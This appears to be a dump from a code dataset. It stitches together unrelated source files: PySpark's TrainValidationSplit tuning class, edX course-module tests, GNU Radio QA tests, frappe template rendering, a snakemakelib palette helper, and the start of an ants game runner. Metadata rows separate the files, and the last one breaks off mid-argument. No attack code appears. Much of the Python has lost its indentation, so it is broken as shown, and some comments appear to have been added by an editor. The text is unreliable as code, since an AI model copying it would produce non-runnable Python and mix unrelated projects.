def __init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,
parallelism=1, seed=None):
"""
__init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,\
parallelism=1, seed=None)
"""
super(TrainValidationSplit, self).__init__()
self._setDefault(trainRatio=0.75, parallelism=1)
kwargs = self._input_kwargs
self._set(**kwargs)
@since("2.0.0")
@keyword_only
def setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,
parallelism=1, seed=None):
"""
setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,\
parallelism=1, seed=None):
Sets params for the train validation split.
"""
kwargs = self._input_kwargs
return self._set(**kwargs)
@since("2.0.0")
def setTrainRatio(self, value):
"""
Sets the value of :py:attr:`trainRatio`.
"""
return self._set(trainRatio=value)
@since("2.0.0")
def getTrainRatio(self):
"""
Gets the value of trainRatio or its default value.
"""
return self.getOrDefault(self.trainRatio)
def _fit(self, dataset):
est = self.getOrDefault(self.estimator)
epm = self.getOrDefault(self.estimatorParamMaps)
numModels = len(epm)
eva = self.getOrDefault(self.evaluator)
tRatio = self.getOrDefault(self.trainRatio)
seed = self.getOrDefault(self.seed)
randCol = self.uid + "_rand"
df = dataset.select("*", rand(seed).alias(randCol))
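        # rand(seed) is uniform on [0, 1), so rows with r >= trainRatio form
        # the validation set: the expected validation fraction is 1 - trainRatio.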
condition = (df[randCol] >= tRatio)
validation = df.filter(condition).cache()
train = df.filter(~condition).cache()
def singleTrain(paramMap):
model = est.fit(train, paramMap)
metric = eva.evaluate(model.transform(validation, paramMap))
return metric
pool = ThreadPool(processes=min(self.getParallelism(), numModels))
metrics = pool.map(singleTrain, epm)
train.unpersist()
validation.unpersist()
if eva.isLargerBetter():
bestIndex = np.argmax(metrics)
else:
bestIndex = np.argmin(metrics)
bestModel = est.fit(dataset, epm[bestIndex])
return self._copyValues(TrainValidationSplitModel(bestModel, metrics))
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
        and some extra params. This creates a deep copy of
the embedded paramMap, and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newTVS = Params.copy(self, extra)
if self.isSet(self.estimator):
newTVS.setEstimator(self.getEstimator().copy(extra))
# estimatorParamMaps remain the same
if self.isSet(self.evaluator):
newTVS.setEvaluator(self.getEvaluator().copy(extra))
return newTVS
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java TrainValidationSplit, create and return a Python wrapper of it.
Used for ML persistence.
"""
estimator, epms, evaluator = super(TrainValidationSplit, cls)._from_java_impl(java_stage)
trainRatio = java_stage.getTrainRatio()
seed = java_stage.getSeed()
parallelism = java_stage.getParallelism()
# Create a new instance of this stage.
py_stage = cls(estimator=estimator, estimatorParamMaps=epms, evaluator=evaluator,
trainRatio=trainRatio, seed=seed, parallelism=parallelism)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java TrainValidationSplit. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
estimator, epms, evaluator = super(TrainValidationSplit, self)._to_java_impl()
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.TrainValidationSplit",
self.uid)
_java_obj.setEstimatorParamMaps(epms)
_java_obj.setEvaluator(evaluator)
_java_obj.setEstimator(estimator)
_java_obj.setTrainRatio(self.getTrainRatio())
_java_obj.setSeed(self.getSeed())
_java_obj.setParallelism(self.getParallelism())
return _java_obj
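# Editor's note (not in the original file): relative training cost of the two
# selection strategies above, for a grid of m param maps:
#   CrossValidator       -> numFolds * m fits, plus one final refit on all data
#   TrainValidationSplit -> m fits, plus one final refit on all data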
class TrainValidationSplitModel(Model, ValidatorParams, MLReadable, MLWritable):
"""
.. note:: Experimental
Model from train validation split.
.. versionadded:: 2.0.0
"""
def __init__(self, bestModel, validationMetrics=[]):
super(TrainValidationSplitModel, self).__init__()
#: best model from cross validation
self.bestModel = bestModel
#: evaluated validation metrics
self.validationMetrics = validationMetrics
def _transform(self, dataset):
return self.bestModel.transform(dataset)
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies the underlying bestModel,
creates a deep copy of the embedded paramMap, and
copies the embedded and extra parameters over.
        It also creates a shallow copy of validationMetrics.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
bestModel = self.bestModel.copy(extra)
validationMetrics = list(self.validationMetrics)
return TrainValidationSplitModel(bestModel, validationMetrics)
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java TrainValidationSplitModel, create and return a Python wrapper of it.
Used for ML persistence.
"""
# Load information from java_stage to the instance.
bestModel = JavaParams._from_java(java_stage.bestModel())
estimator, epms, evaluator = super(TrainValidationSplitModel,
cls)._from_java_impl(java_stage)
# Create a new instance of this stage.
py_stage = cls(bestModel=bestModel).setEstimator(estimator)
py_stage = py_stage.setEstimatorParamMaps(epms).setEvaluator(evaluator)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java TrainValidationSplitModel. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
sc = SparkContext._active_spark_context
        # TODO: persist validation metrics as well
_java_obj = JavaParams._new_java_obj(
"org.apache.spark.ml.tuning.TrainValidationSplitModel",
self.uid,
self.bestModel._to_java(),
_py2java(sc, []))
estimator, epms, evaluator = super(TrainValidationSplitModel, self)._to_java_impl()
_java_obj.set("evaluator", evaluator)
_java_obj.set("estimator", estimator)
_java_obj.set("estimatorParamMaps", epms)
return _java_obj
if __name__ == "__main__":
import doctest
from pyspark.sql import SparkSession
globs = globals().copy()
    # Create a local SparkSession so the doctest examples above can run:
spark = SparkSession.builder\
.master("local[2]")\
.appName("ml.tuning tests")\
.getOrCreate()
sc = spark.sparkContext
globs['sc'] = sc
globs['spark'] = spark
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
spark.stop()
if failure_count:
exit(-1)
| apache-2.0 | 726,195,857,752,410,100 | 35.488827 | 100 | 0.625086 | false |
antonve/s4-project-mooc | common/lib/xmodule/xmodule/tests/test_course_module.py | 2 | 15329 | import unittest
from datetime import datetime, timedelta
from fs.memoryfs import MemoryFS
from mock import Mock, patch
import itertools
from xblock.runtime import KvsFieldData, DictKeyValueStore
import xmodule.course_module
from xmodule.modulestore.xml import ImportSystem, XMLModuleStore
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from django.utils.timezone import UTC
ORG = 'test_org'
COURSE = 'test_course'
NOW = datetime.strptime('2013-01-01T01:00:00', '%Y-%m-%dT%H:%M:00').replace(tzinfo=UTC())
class CourseFieldsTestCase(unittest.TestCase):
def test_default_start_date(self):
self.assertEqual(
xmodule.course_module.CourseFields.start.default,
datetime(2030, 1, 1, tzinfo=UTC())
)
class DummySystem(ImportSystem):
@patch('xmodule.modulestore.xml.OSFS', lambda dir: MemoryFS())
def __init__(self, load_error_modules):
xmlstore = XMLModuleStore("data_dir", source_dirs=[],
load_error_modules=load_error_modules)
course_id = SlashSeparatedCourseKey(ORG, COURSE, 'test_run')
course_dir = "test_dir"
error_tracker = Mock()
super(DummySystem, self).__init__(
xmlstore=xmlstore,
course_id=course_id,
course_dir=course_dir,
error_tracker=error_tracker,
load_error_modules=load_error_modules,
field_data=KvsFieldData(DictKeyValueStore()),
)
def get_dummy_course(start, announcement=None, is_new=None, advertised_start=None, end=None, certs='end'):
"""Get a dummy course"""
system = DummySystem(load_error_modules=True)
def to_attrb(n, v):
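        # Render name="value", lowercased so Python booleans serialize as
        # XML-style "true"/"false" (note this also lowercases any other value).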
return '' if v is None else '{0}="{1}"'.format(n, v).lower()
is_new = to_attrb('is_new', is_new)
announcement = to_attrb('announcement', announcement)
advertised_start = to_attrb('advertised_start', advertised_start)
end = to_attrb('end', end)
start_xml = '''
<course org="{org}" course="{course}" display_organization="{org}_display" display_coursenumber="{course}_display"
graceperiod="1 day" url_name="test"
start="{start}"
{announcement}
{is_new}
{advertised_start}
{end}
certificates_display_behavior="{certs}">
<chapter url="hi" url_name="ch" display_name="CH">
<html url_name="h" display_name="H">Two houses, ...</html>
</chapter>
</course>
'''.format(
org=ORG,
course=COURSE,
start=start,
is_new=is_new,
announcement=announcement,
advertised_start=advertised_start,
end=end,
certs=certs,
)
return system.process_xml(start_xml)
class HasEndedMayCertifyTestCase(unittest.TestCase):
"""Double check the semantics around when to finalize courses."""
def setUp(self):
super(HasEndedMayCertifyTestCase, self).setUp()
system = DummySystem(load_error_modules=True)
#sample_xml = """
# <course org="{org}" course="{course}" display_organization="{org}_display" display_coursenumber="{course}_display"
# graceperiod="1 day" url_name="test"
# start="2012-01-01T12:00"
# {end}
# certificates_show_before_end={cert}>
# <chapter url="hi" url_name="ch" display_name="CH">
# <html url_name="h" display_name="H">Two houses, ...</html>
# </chapter>
# </course>
#""".format(org=ORG, course=COURSE)
past_end = (datetime.now() - timedelta(days=12)).strftime("%Y-%m-%dT%H:%M:00")
future_end = (datetime.now() + timedelta(days=12)).strftime("%Y-%m-%dT%H:%M:00")
self.past_show_certs = get_dummy_course("2012-01-01T12:00", end=past_end, certs='early_with_info')
self.past_show_certs_no_info = get_dummy_course("2012-01-01T12:00", end=past_end, certs='early_no_info')
self.past_noshow_certs = get_dummy_course("2012-01-01T12:00", end=past_end, certs='end')
self.future_show_certs = get_dummy_course("2012-01-01T12:00", end=future_end, certs='early_with_info')
self.future_show_certs_no_info = get_dummy_course("2012-01-01T12:00", end=future_end, certs='early_no_info')
self.future_noshow_certs = get_dummy_course("2012-01-01T12:00", end=future_end, certs='end')
#self.past_show_certs = system.process_xml(sample_xml.format(end=past_end, cert=True))
#self.past_noshow_certs = system.process_xml(sample_xml.format(end=past_end, cert=False))
#self.future_show_certs = system.process_xml(sample_xml.format(end=future_end, cert=True))
#self.future_noshow_certs = system.process_xml(sample_xml.format(end=future_end, cert=False))
def test_has_ended(self):
"""Check that has_ended correctly tells us when a course is over."""
self.assertTrue(self.past_show_certs.has_ended())
self.assertTrue(self.past_show_certs_no_info.has_ended())
self.assertTrue(self.past_noshow_certs.has_ended())
self.assertFalse(self.future_show_certs.has_ended())
self.assertFalse(self.future_show_certs_no_info.has_ended())
self.assertFalse(self.future_noshow_certs.has_ended())
def test_may_certify(self):
"""Check that may_certify correctly tells us when a course may wrap."""
self.assertTrue(self.past_show_certs.may_certify())
self.assertTrue(self.past_noshow_certs.may_certify())
self.assertTrue(self.past_show_certs_no_info.may_certify())
self.assertTrue(self.future_show_certs.may_certify())
self.assertTrue(self.future_show_certs_no_info.may_certify())
self.assertFalse(self.future_noshow_certs.may_certify())
class IsNewCourseTestCase(unittest.TestCase):
"""Make sure the property is_new works on courses"""
def setUp(self):
super(IsNewCourseTestCase, self).setUp()
# Needed for test_is_newish
datetime_patcher = patch.object(
xmodule.course_module, 'datetime',
Mock(wraps=datetime)
)
mocked_datetime = datetime_patcher.start()
mocked_datetime.now.return_value = NOW
self.addCleanup(datetime_patcher.stop)
@patch('xmodule.course_module.datetime.now')
def test_sorting_score(self, gmtime_mock):
gmtime_mock.return_value = NOW
day1 = '2012-01-01T12:00'
day2 = '2012-01-02T12:00'
dates = [
# Announce date takes priority over actual start
# and courses announced on a later date are newer
# than courses announced for an earlier date
((day1, day2, None), (day1, day1, None), self.assertLess),
((day1, day1, None), (day2, day1, None), self.assertEqual),
# Announce dates take priority over advertised starts
((day1, day2, day1), (day1, day1, day1), self.assertLess),
((day1, day1, day2), (day2, day1, day2), self.assertEqual),
# Later start == newer course
((day2, None, None), (day1, None, None), self.assertLess),
((day1, None, None), (day1, None, None), self.assertEqual),
# Non-parseable advertised starts are ignored in preference to actual starts
((day2, None, "Spring"), (day1, None, "Fall"), self.assertLess),
((day1, None, "Spring"), (day1, None, "Fall"), self.assertEqual),
# Partially parsable advertised starts should take priority over start dates
((day2, None, "October 2013"), (day2, None, "October 2012"), self.assertLess),
((day2, None, "October 2013"), (day1, None, "October 2013"), self.assertEqual),
# Parseable advertised starts take priority over start dates
((day1, None, day2), (day1, None, day1), self.assertLess),
((day2, None, day2), (day1, None, day2), self.assertEqual),
]
for a, b, assertion in dates:
a_score = get_dummy_course(start=a[0], announcement=a[1], advertised_start=a[2]).sorting_score
b_score = get_dummy_course(start=b[0], announcement=b[1], advertised_start=b[2]).sorting_score
print "Comparing %s to %s" % (a, b)
assertion(a_score, b_score)
start_advertised_settings = [
# start, advertised, result, is_still_default, date_time_result
('2012-12-02T12:00', None, 'Dec 02, 2012', False, u'Dec 02, 2012 at 12:00 UTC'),
('2012-12-02T12:00', '2011-11-01T12:00', 'Nov 01, 2011', False, u'Nov 01, 2011 at 12:00 UTC'),
('2012-12-02T12:00', 'Spring 2012', 'Spring 2012', False, 'Spring 2012'),
('2012-12-02T12:00', 'November, 2011', 'November, 2011', False, 'November, 2011'),
(xmodule.course_module.CourseFields.start.default, None, 'TBD', True, 'TBD'),
(xmodule.course_module.CourseFields.start.default, 'January 2014', 'January 2014', False, 'January 2014'),
]
@patch('xmodule.course_module.datetime.now')
def test_start_date_text(self, gmtime_mock):
gmtime_mock.return_value = NOW
for s in self.start_advertised_settings:
d = get_dummy_course(start=s[0], advertised_start=s[1])
print "Checking start=%s advertised=%s" % (s[0], s[1])
self.assertEqual(d.start_datetime_text(), s[2])
@patch('xmodule.course_module.datetime.now')
def test_start_date_time_text(self, gmtime_mock):
gmtime_mock.return_value = NOW
for setting in self.start_advertised_settings:
course = get_dummy_course(start=setting[0], advertised_start=setting[1])
print "Checking start=%s advertised=%s" % (setting[0], setting[1])
self.assertEqual(course.start_datetime_text("DATE_TIME"), setting[4])
def test_start_date_is_default(self):
for s in self.start_advertised_settings:
d = get_dummy_course(start=s[0], advertised_start=s[1])
self.assertEqual(d.start_date_is_still_default, s[3])
def test_display_organization(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
self.assertNotEqual(descriptor.location.org, descriptor.display_org_with_default)
self.assertEqual(descriptor.display_org_with_default, "{0}_display".format(ORG))
def test_display_coursenumber(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
self.assertNotEqual(descriptor.location.course, descriptor.display_number_with_default)
self.assertEqual(descriptor.display_number_with_default, "{0}_display".format(COURSE))
def test_is_newish(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-02-02T12:00', is_new=False)
assert(descriptor.is_newish is False)
descriptor = get_dummy_course(start='2013-02-02T12:00', is_new=True)
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-01-15T12:00')
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-03-01T12:00')
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2012-10-15T12:00')
assert(descriptor.is_newish is False)
descriptor = get_dummy_course(start='2012-12-31T12:00')
assert(descriptor.is_newish is True)
def test_end_date_text(self):
# No end date set, returns empty string.
d = get_dummy_course('2012-12-02T12:00')
self.assertEqual('', d.end_datetime_text())
d = get_dummy_course('2012-12-02T12:00', end='2014-9-04T12:00')
self.assertEqual('Sep 04, 2014', d.end_datetime_text())
def test_end_date_time_text(self):
# No end date set, returns empty string.
course = get_dummy_course('2012-12-02T12:00')
self.assertEqual('', course.end_datetime_text("DATE_TIME"))
course = get_dummy_course('2012-12-02T12:00', end='2014-9-04T12:00')
self.assertEqual('Sep 04, 2014 at 12:00 UTC', course.end_datetime_text("DATE_TIME"))
class DiscussionTopicsTestCase(unittest.TestCase):
def test_default_discussion_topics(self):
d = get_dummy_course('2012-12-02T12:00')
self.assertEqual({'General': {'id': 'i4x-test_org-test_course-course-test'}}, d.discussion_topics)
class TeamsConfigurationTestCase(unittest.TestCase):
"""
Tests for the configuration of teams and the helper methods for accessing them.
"""
def setUp(self):
super(TeamsConfigurationTestCase, self).setUp()
self.course = get_dummy_course('2012-12-02T12:00')
self.course.teams_configuration = dict()
self.count = itertools.count()
def add_team_configuration(self, max_team_size=3, topics=None):
""" Add a team configuration to the course. """
teams_configuration = {}
teams_configuration["topics"] = [] if topics is None else topics
if max_team_size is not None:
teams_configuration["max_team_size"] = max_team_size
self.course.teams_configuration = teams_configuration
def make_topic(self):
""" Make a sample topic dictionary. """
next_num = self.count.next()
topic_id = "topic_id_{}".format(next_num)
display_name = "Display Name {}".format(next_num)
description = "Description {}".format(next_num)
return {"display_name": display_name, "description": description, "id": topic_id}
def test_teams_enabled_new_course(self):
# Make sure we can detect when no teams exist.
self.assertFalse(self.course.teams_enabled)
# add topics
self.add_team_configuration(max_team_size=4, topics=[self.make_topic()])
self.assertTrue(self.course.teams_enabled)
# remove them again
self.add_team_configuration(max_team_size=4, topics=[])
self.assertFalse(self.course.teams_enabled)
def test_teams_enabled_max_size_only(self):
self.add_team_configuration(max_team_size=4)
self.assertFalse(self.course.teams_enabled)
def test_teams_enabled_no_max_size(self):
self.add_team_configuration(max_team_size=None, topics=[self.make_topic()])
self.assertTrue(self.course.teams_enabled)
def test_teams_max_size_no_teams_configuration(self):
self.assertIsNone(self.course.teams_max_size)
def test_teams_max_size_with_teams_configured(self):
size = 4
self.add_team_configuration(max_team_size=size, topics=[self.make_topic(), self.make_topic()])
self.assertTrue(self.course.teams_enabled)
self.assertEqual(size, self.course.teams_max_size)
def test_teams_topics_no_teams(self):
self.assertIsNone(self.course.teams_topics)
def test_teams_topics_no_topics(self):
self.add_team_configuration(max_team_size=4)
self.assertEqual(self.course.teams_topics, [])
def test_teams_topics_with_topics(self):
topics = [self.make_topic(), self.make_topic()]
self.add_team_configuration(max_team_size=4, topics=topics)
self.assertTrue(self.course.teams_enabled)
self.assertEqual(self.course.teams_topics, topics)
| agpl-3.0 | 1,105,887,058,775,413,200 | 42.797143 | 124 | 0.637093 | false |
gnychis/gnuradio-3.5.0-dmr | gnuradio-core/src/python/gnuradio/gr/qa_fsk_stuff.py | 11 | 2664 | #!/usr/bin/env python
#
# Copyright 2004,2007,2010 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
import math
def sincos(x):
return math.cos(x) + math.sin(x) * 1j
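# Note: cos(x) + 1j*sin(x) is Euler's formula for the complex exponential
# e^(jx), i.e. equivalent to cmath.exp(1j * x).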
class test_bytes_to_syms (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_bytes_to_syms_001 (self):
src_data = (0x01, 0x80, 0x03)
expected_result = (-1, -1, -1, -1, -1, -1, -1, +1,
+1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, +1, +1)
src = gr.vector_source_b (src_data)
op = gr.bytes_to_syms ()
dst = gr.vector_sink_f ()
self.tb.connect (src, op)
self.tb.connect (op, dst)
self.tb.run ()
result_data = dst.data ()
self.assertEqual (expected_result, result_data)
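        # Note: gr.bytes_to_syms expands each byte MSB-first into eight float
        # symbols, mapping bit 1 -> +1.0 and bit 0 -> -1.0, which is exactly
        # what expected_result above encodes for 0x01, 0x80, 0x03.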
def test_simple_framer (self):
src_data = (0x00, 0x11, 0x22, 0x33,
0x44, 0x55, 0x66, 0x77,
0x88, 0x99, 0xaa, 0xbb,
0xcc, 0xdd, 0xee, 0xff)
expected_result = (
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x00, 0x00, 0x11, 0x22, 0x33, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x01, 0x44, 0x55, 0x66, 0x77, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x02, 0x88, 0x99, 0xaa, 0xbb, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x03, 0xcc, 0xdd, 0xee, 0xff, 0x55)
src = gr.vector_source_b (src_data)
op = gr.simple_framer (4)
dst = gr.vector_sink_b ()
self.tb.connect (src, op)
self.tb.connect (op, dst)
self.tb.run ()
result_data = dst.data ()
self.assertEqual (expected_result, result_data)
if __name__ == '__main__':
gr_unittest.run(test_bytes_to_syms, "test_bytes_to_syms.xml")
| gpl-3.0 | 5,042,378,309,125,066,000 | 34.52 | 95 | 0.587462 | false |
pawaranand/phr-frappe | frappe/website/template.py | 16 | 2988 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import strip_html
from frappe.website.utils import scrub_relative_urls
from jinja2.utils import concat
from jinja2 import meta
import re
def render_blocks(context):
"""returns a dict of block name and its rendered content"""
out = {}
env = frappe.get_jenv()
def _render_blocks(template_path):
source = frappe.local.jloader.get_source(frappe.local.jenv, template_path)[0]
for referenced_template_path in meta.find_referenced_templates(env.parse(source)):
if referenced_template_path:
_render_blocks(referenced_template_path)
template = frappe.get_template(template_path)
for block, render in template.blocks.items():
out[block] = scrub_relative_urls(concat(render(template.new_context(context))))
_render_blocks(context["template"])
# default blocks if not found
if "title" not in out and out.get("header"):
out["title"] = out["header"]
if "title" not in out:
out["title"] = context.get("title")
if "header" not in out and out.get("title"):
out["header"] = out["title"]
if out.get("header") and not out["header"].startswith("<h"):
out["header"] = "<h2>" + out["header"] + "</h2>"
if "breadcrumbs" not in out:
if context.doc and hasattr(context.doc, "get_parents"):
context.parents = context.doc.get_parents(context)
out["breadcrumbs"] = scrub_relative_urls(
frappe.get_template("templates/includes/breadcrumbs.html").render(context))
if "meta_block" not in out:
out["meta_block"] = frappe.get_template("templates/includes/meta_block.html").render(context)
out["no_sidebar"] = context.get("no_sidebar", 0)
if "<!-- no-sidebar -->" in out.get("content", ""):
out["no_sidebar"] = 1
if "<!-- title:" in out.get("content", ""):
out["title"] = re.findall('<!-- title:([^>]*) -->', out.get("content"))[0].strip()
if "{index}" in out.get("content", "") and context.get("children"):
html = frappe.get_template("templates/includes/static_index.html").render({
"items": context["children"]})
out["content"] = out["content"].replace("{index}", html)
if "{next}" in out.get("content", ""):
next_item = context.doc.get_next()
if next_item:
if next_item.name[0]!="/": next_item.name = "/" + next_item.name
html = '''<p><br><a href="{name}" class="btn btn-primary">
{title} <i class="icon-chevron-right"></i></a>
</p>'''.format(**next_item)
out["content"] = out["content"].replace("{next}", html)
if "sidebar" not in out and not out.get("no_sidebar"):
out["sidebar"] = scrub_relative_urls(
frappe.get_template("templates/includes/sidebar.html").render(context))
out["title"] = strip_html(out.get("title") or "")
# remove style and script tags from blocks
out["style"] = re.sub("</?style[^<>]*>", "", out.get("style") or "")
out["script"] = re.sub("</?script[^<>]*>", "", out.get("script") or "")
return out
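# Illustrative output (keys depend on the page template): render_blocks(context)
# yields a dict such as {"title": ..., "header": "<h2>...</h2>", "content": ...,
# "sidebar": ..., "style": ..., "script": ...} with style/script tags stripped.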
| mit | -8,699,666,599,041,346,000 | 32.954545 | 95 | 0.661647 | false |
percyfal/snakemakelib-core | snakemakelib/plot/bokeh/color.py | 1 | 1126 | # Copyright (C) 2015 by Per Unneberg
import math
import pandas.core.common as com
from bokeh.palettes import brewer as bokeh_brewer
from .palettes import brewer as snakemakelib_brewer
import logging
logger = logging.getLogger(__name__)
MINSIZE = 3
MAXSIZE = 9 # FIXME: some palettes have 9 as max, some 11
brewer = bokeh_brewer
brewer.update(snakemakelib_brewer)
def colorbrewer(size=MINSIZE, palette="Paired", datalen=None):
"""Generate a color palette following colorbrewer.
Args:
size (int): size of desired palette
palette (str): name of palette
datalen (int): length of data vector. If None, the palette size
will equal size, else the colors will be reused to fill
up a vector of length datalen
Returns:
palette (list): list of colors
"""
size = max(MINSIZE, min(size, MAXSIZE))
    if datalen is not None and MINSIZE <= datalen <= MAXSIZE:
        size = datalen
    colors = brewer[palette][size]
    if datalen is not None and datalen > size:
        colors = colors * int(math.ceil(float(datalen) / size))
return colors[0:datalen]
else:
return colors
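# Illustrative call (values assumed): colorbrewer(size=4, palette="Paired",
# datalen=10) clamps the palette to 4 colors and cycles them to cover all
# 10 data points; with datalen=None the plain 4-color palette is returned.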
| mit | -7,536,610,641,493,095,000 | 28.631579 | 76 | 0.666075 | false |
jacinda/ant | playgame.py | 1 | 20674 | #!/usr/bin/env python
from __future__ import print_function
import traceback
import sys
import os
import time
from optparse import OptionParser, OptionGroup
import random
import cProfile
import visualizer.visualize_locally
import json
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from ants import Ants
sys.path.append("../worker")
try:
from engine import run_game
except ImportError:
# this can happen if we're launched with cwd outside our own dir
# get our full path, then work relative from that
cmd_folder = os.path.dirname(os.path.abspath(__file__))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
sys.path.append(cmd_folder + "/../worker")
# try again
from engine import run_game
# make stderr red text
try:
import colorama
colorama.init()
colorize = True
color_default = (colorama.Fore.RED)
color_reset = (colorama.Style.RESET_ALL)
except:
colorize = False
color_default = None
color_reset = None
class Colorize(object):
def __init__(self, file, color=color_default):
self.file = file
self.color = color
self.reset = color_reset
def write(self, data):
if self.color:
self.file.write(''.join(self.color))
self.file.write(data)
if self.reset:
self.file.write(''.join(self.reset))
def flush(self):
self.file.flush()
def close(self):
self.file.close()
if colorize:
stderr = Colorize(sys.stderr)
else:
stderr = sys.stderr
class Comment(object):
def __init__(self, file):
self.file = file
self.last_char = '\n'
def write(self, data):
for char in data:
if self.last_char == '\n':
self.file.write('# ')
self.file.write(char)
self.last_char = char
def flush(self):
self.file.flush()
def close(self):
self.file.close()
class Tee(object):
''' Write to multiple files at once '''
def __init__(self, *files):
self.files = files
def write(self, data):
for file in self.files:
file.write(data)
def flush(self):
for file in self.files:
file.flush()
def close(self):
for file in self.files:
file.close()
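# Illustrative use (stream names assumed): Tee(sys.stdout, open('0.replay', 'w'))
# duplicates every write to both the console and the replay file, which is how
# --log_stdout is combined with --log_replay further below.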
def main(argv):
usage ="Usage: %prog [options] map bot1 bot2\n\nYou must specify a map file."
parser = OptionParser(usage=usage)
# map to be played
# number of players is determined by the map file
parser.add_option("-m", "--map_file", dest="map",
help="Name of the map file")
# maximum number of turns that the game will be played
parser.add_option("-t", "--turns", dest="turns",
default=1000, type="int",
help="Number of turns in the game")
parser.add_option("--serial", dest="serial",
action="store_true",
help="Run bots in serial, instead of parallel.")
parser.add_option("--turntime", dest="turntime",
default=1000, type="int",
help="Amount of time to give each bot, in milliseconds")
parser.add_option("--loadtime", dest="loadtime",
default=3000, type="int",
help="Amount of time to give for load, in milliseconds")
parser.add_option("-r", "--rounds", dest="rounds",
default=1, type="int",
help="Number of rounds to play")
parser.add_option("--player_seed", dest="player_seed",
default=None, type="int",
help="Player seed for the random number generator")
parser.add_option("--engine_seed", dest="engine_seed",
default=None, type="int",
help="Engine seed for the random number generator")
parser.add_option('--strict', dest='strict',
action='store_true', default=False,
help='Strict mode enforces valid moves for bots')
parser.add_option('--capture_errors', dest='capture_errors',
action='store_true', default=False,
help='Capture errors and stderr in game result')
parser.add_option('--end_wait', dest='end_wait',
default=0, type="float",
help='Seconds to wait at end for bots to process end')
parser.add_option('--secure_jail', dest='secure_jail',
action='store_true', default=False,
help='Use the secure jail for each bot (*nix only)')
parser.add_option('--fill', dest='fill',
action='store_true', default=False,
help='Fill up extra player starts with last bot specified')
parser.add_option('-p', '--position', dest='position',
default=0, type='int',
help='Player position for first bot specified')
# ants specific game options
game_group = OptionGroup(parser, "Game Options", "Options that affect the game mechanics for ants")
game_group.add_option("--attack", dest="attack",
default="focus",
help="Attack method to use for engine. (closest, focus, support, damage)")
game_group.add_option("--kill_points", dest="kill_points",
default=2, type="int",
help="Points awarded for killing a hill")
game_group.add_option("--food", dest="food",
default="symmetric",
help="Food spawning method. (none, random, sections, symmetric)")
game_group.add_option("--viewradius2", dest="viewradius2",
default=77, type="int",
help="Vision radius of ants squared")
game_group.add_option("--spawnradius2", dest="spawnradius2",
default=1, type="int",
help="Spawn radius of ants squared")
game_group.add_option("--attackradius2", dest="attackradius2",
default=5, type="int",
help="Attack radius of ants squared")
game_group.add_option("--food_rate", dest="food_rate", nargs=2, type="int", default=(5,11),
help="Numerator of food per turn per player rate")
game_group.add_option("--food_turn", dest="food_turn", nargs=2, type="int", default=(19,37),
help="Denominator of food per turn per player rate")
game_group.add_option("--food_start", dest="food_start", nargs=2, type="int", default=(75,175),
help="One over percentage of land area filled with food at start")
game_group.add_option("--food_visible", dest="food_visible", nargs=2, type="int", default=(3,5),
help="Amount of food guaranteed to be visible to starting ants")
game_group.add_option("--carry_food", dest="carry_food", type="int", default=100,
help="Amount of food that ants can carry. If carry_food==0, food is teleported to hill (original game behaviour)")
game_group.add_option("--cutoff_turn", dest="cutoff_turn", type="int", default=150,
